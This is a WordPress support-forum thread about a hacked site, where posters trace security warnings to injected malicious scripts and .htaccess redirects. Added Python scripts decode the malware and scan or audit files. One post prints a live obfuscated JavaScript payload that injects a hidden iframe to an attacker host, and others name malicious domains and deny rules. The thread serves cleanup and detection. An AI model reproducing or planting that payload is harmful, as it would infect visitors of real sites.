• Resolved cfisher

    (@cfisher)


    Hello,

    I am using Version 1.9.1 of your plugin.

    Things have worked great for a long time but recently things have gone haywire.

    I have two problems that I cannot seem to figure out.

    1. I am now forced to log into my WordPress admin via https. If I log in via http, I am redirected to the login each and every time.

    2. For some reason, I started to get browser warnings that my https is not loading secure along with a broken https in the browser's URL line. The culprit turned out to be https://superpuperdomain.com/count.php which apparently is WordPress core code (index.php). So I enabled, as suggested in this forum, External HTTPS Elements and Bypass External Check. That fixed the security errors. However, now in Internet Explorer 9, I get this warning, “Internet Explorer block this website from displaying content with security certificate errors.” The interesting thing is this appears on non-https pages – even before I reach a https page. This is a new error, and I am confident my security certificate is fine.

    Any suggestions?

    Thanks!
    Chris

Viewing 15 replies - 16 through 30 (of 34 total)
  • I filed a complaint at superpuperdomain.com’s registrar with some additional information and a virus report. I am very pleased to let y’all know the domain has been suspended.

    I’m getting crap from superpuperdomain2.com

    Did you add the .htaccess I suggested?

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain.com
    deny from superpuperdomain2.com
    allow from all

    I also suggest you ban the IP and IP range from those domains. You can use the WP-Ban plugin for this, or any other plugin that works the same.

    Hello all, like many of you, one of my sites was affected by this crap…

    But I’ve found something else after cleaning it, a little iframe, in a JavaScript (obfuscated), in my case it was in \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js …

    var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

    And it basically adds an iframe going to: https://counter-wordpress.com/frame.php … It’s obviously engineered to be stealthy, as it’s not showing in your HTML source and is loaded by a WordPress JS, and it probably doesn’t do much at this moment (probably in standby) …

    Anyone else have this?
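A static way to read a script packed like the one posted above without running it, as an added example that is not code from the thread. The sample is constructed in the same two-layer format (hex-escaped strings, then a `|`-separated word list indexed by base-N tokens) with a placeholder host; on a real file the base and word list come from the arguments of the `eval(function ...)` call, and all function names here are hypothetical.

```python
import re

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def unescape_hex(s):
    """Turn literal \\xNN escapes, as stored in the file, into characters."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)

def to_base(n, base):
    """Match JavaScript's n.toString(base) for non-negative integers."""
    out = ""
    while True:
        n, r = divmod(n, base)
        out = DIGITS[r] + out
        if n == 0:
            return out

def unpack(packed, base, words):
    """Swap every base-N token in `packed` for its dictionary word."""
    table = {to_base(i, base): w or to_base(i, base) for i, w in enumerate(words)}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), packed)

def iframe_targets(js):
    """URLs assigned to a .src property in the decoded script."""
    return re.findall(r"\.src\s*=\s*['\"]([^'\"]+)['\"]", js)

# Constructed sample in the same two-layer format (placeholder host, not the thread's).
WORDS = "el|document|createElement|iframe|var|src|http|placeholder|invalid|frame|php"
PACKED = "4 0=1.2(\"3\");0.5='6://7.8/9.a'"

def hexify(s):
    """Render a string as \\xNN escapes, the way the first layer looks on disk."""
    return "".join("\\x%02x" % ord(c) for c in s)

ON_DISK = [hexify(PACKED), hexify(WORDS)]

def decode_sample(layers=ON_DISK, base=11):
    packed, words = (unescape_hex(x) for x in layers)
    return unpack(packed, base, words.split("|"))

if __name__ == "__main__":
    js = decode_sample()
    print(js)
    print(iframe_targets(js))
```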

    I have the files, but not the piece of code you are giving…..

    Well, I’ve seen 2 other sites that got this, after being affected by the PHPRemoteView via timthumb …

    Dang. Now I see that I have it too…

    Elmo_is_evil

    It did not occur in my case.

    No guarantees, but you can check the dates of the files in your WordPress installation. Those infected are dated the day of infection.

    I made a post in Portuguese, reporting on my case.

    https://www.bdibbs.com.br/2011/falha-de-seguranca-no-timthumb

    Plugin Author mvied

    (@mvied)

    I checked out https://counter-wordpress.com/frame.php and it appears to load some scripts and then redirect to https://global-traff.com/tds/in.cgi?5&user=mexx and then to https://global-traff.com/tds/in.cgi?mexx and then to https://global-traff.com/tds/in.cgi?18 and then to https://global-traff.com/empity.html.

    The frame.php appears to be the same script from superpuperdomain.com and superpuperdomain2.com.

    After viewing the file once, it will always be blank (it probably stores your IP address and doesn’t load anything again afterward). I haven’t been able to pull the page back up to prevent the redirect and see exactly what it’s loading.

    Cool info Mvied, I will check with one of my dynamic IP VPNs …

    Thanks, Elmo_is_evil. Your earlier comment helped me track down the same thing on every WP installation on my server.

    If you find this in any other files, please note it and I’ll do the same.

    Update:

    The same code was appended to any script in any directory that started with ‘jquery’. So, even old versions of jQuery in old plugins, like ‘jquery-1.3.2.min.js’ were affected.
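A sweep for the pattern described in this thread, as an added example that is not code from any poster: it walks a WordPress tree, flags every `.js` file carrying both markers of the posted sample (a hex-escaped `_0x…` string array and an `eval(function (` unpacker), and reports the file date plus whether the name matches the reported `jquery*` / `l10n.js` pattern. The demo tree, the stub snippet and the date are constructed, and the function names are hypothetical.

```python
import os, re, tempfile, time

# Markers taken from the sample posted in the thread: a hex-escaped string array
# named _0x... plus an eval(function (...)) unpacker.
HEX_ARRAY = re.compile(r'var\s+_0x[0-9a-f]+\s*=\s*\["(?:\\x[0-9a-fA-F]{2}){8,}')
EVAL_PACKER = re.compile(r"eval\(function\s*\(")

def reported_name(name):
    """True for the names reported in the thread: jquery* scripts and l10n.js."""
    n = name.lower()
    return n.startswith("jquery") or n == "l10n.js"

def scan(root):
    """Return sorted (relative path, UTC mtime date, reported_name) for flagged .js."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(".js")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if HEX_ARRAY.search(text) and EVAL_PACKER.search(text):
                day = time.strftime("%Y-%m-%d", time.gmtime(os.path.getmtime(path)))
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits.append((rel, day, reported_name(name)))
    return sorted(hits)

# Constructed demo tree; the appended snippet is a harmless stand-in for the payload.
STUB = r'var _0xabcd=["\x61\x62\x63\x64\x65\x66\x67\x68"];eval(function (a){return a}(_0xabcd[0]));'
DEMO = {
    "wp-includes/js/jquery/jquery.js": "/* jQuery */\n" + STUB,
    "wp-content/plugins/old/jquery-1.3.2.min.js": "/* old jQuery */\n" + STUB,
    "wp-includes/js/l10n.js": "/* clean */\n",
    "wp-content/themes/x/slider.js": "/* theme script */\n" + STUB,
}

def build_demo(root, infected_at=1312200000):  # 2011-08-01 UTC, constructed date
    for rel, body in DEMO.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        if STUB in body:
            os.utime(path, (infected_at, infected_at))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo(tmp)
        for hit in scan(tmp):
            print(hit)
```

The reported date is only a hint, since whoever writes a file can also set its modification time; the content markers are what flag it.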

    Okay… Now my other site got hacked too. Not by superpuperdomain.com but touchtrip.ru….

    It seems to be a lot more difficult to resolve.

    Anyone else got probs with downloading plugins through the backend? Like, get redirected to google, or the malware message from google?

    Found it, my .htaccess file had a few hidden lines that linked to http:*//distributioncorporate*.ru/kloac/index.php

    Delete your .htaccess file and make a new one.

    These hackers also place phony files in your wordpress installation. Check your uploads directory and theme files for sm3.php and other files you don’t recognize.
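The two checks from the last posts, as an added example that is not code from the thread: an audit of `.htaccess` for redirect directives that point at a host other than your own, and a listing of `.php` files under `wp-content/uploads`. It assumes "hidden" means pushed out of view with blank lines or leading whitespace; the sample file, the hosts `example.org` and `redirect.invalid`, the thresholds and the function names are constructed for illustration.

```python
import os, re, tempfile
from urllib.parse import urlparse

DIRECTIVE = re.compile(r"^\s*(RewriteRule|Redirect\w*|ErrorDocument)\b(.*)$", re.I)
URL = re.compile(r"https?://[^\s\"'\]]+", re.I)

def audit_htaccess(text, own_hosts):
    """Return (line_no, directive, host, hidden) for rules pointing at foreign hosts."""
    findings, blank_run = [], 0
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            blank_run += 1
            continue
        m = DIRECTIVE.match(line)
        urls = URL.findall(m.group(2)) if m else []
        for url in urls:
            host = (urlparse(url).hostname or "").lower()
            if host and host not in own_hosts:
                indent = len(line) - len(line.lstrip())
                # Assumed meaning of "hidden": pushed out of view by padding.
                findings.append((no, m.group(1), host, indent >= 40 or blank_run >= 20))
        blank_run = 0
    return findings

def php_in_uploads(wp_root):
    """Relative paths of .php files under wp-content/uploads (a media directory)."""
    base, found = os.path.join(wp_root, "wp-content", "uploads"), []
    for dirpath, _dirs, files in os.walk(base):
        found += [os.path.relpath(os.path.join(dirpath, f), wp_root).replace(os.sep, "/")
                  for f in files if f.lower().endswith(".php")]
    return sorted(found)

# Constructed .htaccess: a trimmed WordPress block plus one padded, off-site redirect.
SAMPLE = (
    "# BEGIN WordPress\nRewriteEngine On\nRewriteBase /\n"
    "RewriteRule ^index\\.php$ - [L]\nRewriteRule . /index.php [L]\n# END WordPress\n"
    + "\n" * 30 + " " * 200
    + "RewriteRule ^(.*)$ http://redirect.invalid/index.php [R=301,L]\n"
)

if __name__ == "__main__":
    print(audit_htaccess(SAMPLE, {"example.org"}))
    with tempfile.TemporaryDirectory() as tmp:
        up = os.path.join(tmp, "wp-content", "uploads", "2011", "08")
        os.makedirs(up)
        for name in ("photo.jpg", "sm3.php"):
            open(os.path.join(up, name), "w").close()
        print(php_in_uploads(tmp))
```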

  • The topic ‘Two Strange Errors’ is closed to new replies.